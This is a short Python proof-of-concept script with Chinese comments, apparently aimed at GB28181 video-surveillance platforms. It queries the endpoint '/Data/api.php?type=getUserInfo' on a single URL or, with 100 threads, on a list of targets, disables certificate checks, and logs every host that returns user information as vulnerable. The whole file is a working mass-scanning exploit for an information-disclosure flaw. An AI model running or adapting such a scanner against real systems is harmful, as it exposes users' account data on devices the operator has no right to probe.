import requests,argparse,sys,json,urllib3
from multiprocessing.dummy import Pool
#第二步  关闭警告
requests.packages.urllib3.disable_warnings()

# 横幅

def banner():
    test = """ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓███████▓▒░ ░▒▓██████▓▒░   ░▒▓█▓▒░░▒▓██████▓▒░   ░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░             ░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████▓▒░ 
░▒▓█▓▒░       ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░             ░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  ░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  ░▒▓█▓▒░ 
░▒▓█▓▒░       ░▒▓█▓▒▒▓█▓▒░░▒▓██████▓▒░  ░▒▓██████▓▒░ ░▒▓██████▓▒░   ░▒▓█▓▒░░▒▓██████▓▒░   ░▒▓█▓▒░ 
░▒▓█▓▒░        ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░      ░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░  ░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  ░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░      ░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░  ░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  ░▒▓█▓▒░ 
 ░▒▓██████▓▒░   ░▒▓██▓▒░  ░▒▓████████▓▒░▒▓████████▓▒░░▒▓██████▓▒░   ░▒▓█▓▒░░▒▓██████▓▒░   ░▒▓█▓▒░ 
                                                                                       author  lym
                                                                                       version 1.0.0           

""" 
    print(test)


def main():
    banner()
#处理命令行参数
    parser = argparse.ArgumentParser(description="国标28181信息泄露")



#添加参数
    parser.add_argument('-u','--url',dest='url',type=str,help='please input url')
    parser.add_argument('-f','--file',dest='file',type=str,help='please input file')


    args = parser.parse_args()

    if args.url and not args.file:
        poc(args.url)
    if args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")



def poc(target):
    payload = '/Data/api.php?type=getUserInfo'
    try:
        res1 = requests.get(url=target+payload,verify=False,timeout=5)
        res1.raise_for_status()
        res2 = res1.json()
        if '获取成功！' == res2["msg"]:
            print(f"[+]{target} 存在漏洞")
            with open('result.txt','a') as fp:
                fp.write(target+'\n')
        else:
            print(f"[-]{target} 不存在")
    except requests.exceptions.RequestException as e:
        print(f"[-]{target}    请求异常")


#函数入口
if __name__ == "__main__":
    main()
